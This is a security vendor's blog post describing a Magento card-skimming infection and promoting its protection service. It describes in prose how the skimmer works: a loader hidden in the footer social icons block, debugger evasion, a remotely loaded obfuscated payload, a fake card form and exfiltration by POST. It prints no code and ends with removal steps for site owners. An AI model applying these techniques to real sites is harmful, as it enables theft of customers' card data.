10 Jul, 2019

Skimmer Malware in Magento

We recently uncovered a skimmer that infects websites using Magneto. A speedy response is important, and we work to remove threats and get your site back online as fast as possible.
We regularly help website owners to clean up malware from their sites. A speedy response is important, and we work to remove threats and get the site back online as fast as possible. A quick recovery keeps the site's reputation from suffering.

Any kind of intrusion on a website is troublesome. Some do obvious damage which any visitor can see. They may redirect the browser to a malicious site with malware or disgusting content. They may insert spam content in the form of unauthorized ads or comments. Using an iframe, they may overlay an entire remote page on the target site. Visitors will flee from the site, and it will disappear from search engine results.

The worst kind of damage may not be visible at all. A persistent threat can install itself on a site and send confidential information to a server over a long period of time. Until the breach is discovered, the intruder gathers personal information or trade secrets. Sometimes the leak goes on for weeks or months.

Once it's discovered, the site's reputation will suffer serious damage. Customers will refuse to use it. Payment processing centers may refuse to deal with it. There could be expensive legal consequences.

Every site needs a website protection strategy to minimize the risk of a breach. There's no such thing as a site that's too obscure or too unimportant to be a target. Operators of eCommerce sites need to be especially wary, whether they're little one-product shops or large enterprises.
Skimmer malware
A skimmer is an inconspicuous device installed on an ATM or another type of card reader. It captures the information when people use their cards to make purchases and withdrawals. Skimmer malware does the same thing in software. It either intercepts payment information from a legitimate purchase form or puts up a bogus payment form on the victim's site. Either way, the data, including names and credit card numbers, goes to a remote server under the intruder's control.

It isn't easy for the customer to spot the problem. The transaction goes through just as it always does. There's no noticeable effect on processing speed. The site owner sees purchases being processed without any indication of a problem. This situation can go on for a long time without anyone noticing anything wrong. But the customers eventually discover they're the victims of identity theft and fraudulent purchases.

Sites that sell items online, even if they use a third party to process credit card payments, are expected to comply with PCI security requirements. A site that is deemed negligent may be cut off from all credit card processing services. It could have to pay a fine to get back into good standing.
Magento CC stealer
The skimmer which we recently discovered infects websites running Magento. It injects JavaScript into the footer_social_icon area, which is included on every page of a typical site. This JavaScript is just the loader:
It's the part that stays on the victim's server persistently. It checks if the site is running under a debugger, as a way to avoid detection. If it isn't, it loads the payload.

The actual skimmer code is loaded from a remote site after a randomized delay. It makes heavy use of runtime string concatenation to construct the key parts of the code.
This makes it hard for humans to read the code and for malware detection software to recognize suspicious patterns. The skimmer payload is never stored on the victim's server.

The skimmer performs some suspicious actions. It asks for the customer's credit card number through the victim's site, not the payment processing site. The user then has to enter the information again on the payment site. However, many users won't realize something is wrong until after they've given away their information, if at all. The real payment processing still works properly.

Here is the decoded part of the var_$_bd55 variable:
The malware uses a POST request to send the stolen information to a server controlled by the attacker. The longer it stays on the server without being removed, the more card numbers it will collect.
Removing the CC stealer
If you think this code is infecting your site, you can find and remove the loader by hand. In the Magento admin panel, look for and open CMS->Footer Social Icons. If the PHP code shown includes the selected text, delete it and save the changes.
Making a backup before changing any PHP code on the server is a good idea. If you delete the code incorrectly, the footer social icons block could stop working.

Making a backup before changing any PHP code on the server is a good idea. If you delete the code incorrectly, the footer social icons block could stop working.

If this CC stealer were the only problem, it would be easy to look for it and remove it. But the list of threats to Magento sites grows constantly, and finding each one by hand requires a different search strategy. More than one threat can be present at the same time.

Trying to find all possible threats that way wouldn't leave time to do anything else. Manual removal works when you suspect a specific kind of malware, but for ongoing website security, you need a more efficient approach that covers all threats.
Protection with ThreatSign
Website protection requires a multi-layered approach. Any available software patches need to be installed soon after they become available. Accounts need strong passwords and multi-factor authentication to deter break-in attempts. A subscription to ThreatSign from Quttera provides multiple forms of protection, including:

  • Discovery and removal of malware
  • Request filtering
  • Monitoring of traffic
  • A web application firewall (WAF) to stop Magento-specific attacks
  • Checking of your domain against blacklists
  • Prompt recovery from blacklisting
A malware analysis will conduct a thorough check of your site, finding and removing malware using the latest threat intelligence and analysis techniques. Ongoing monitoring will ensure that any subsequent attacks are caught and stopped quickly.

Sign up for the ThreatSign plan that best suits your organization's needs and budget. It will pay for itself in greater user confidence, reduction in security incidents, and increased uptime.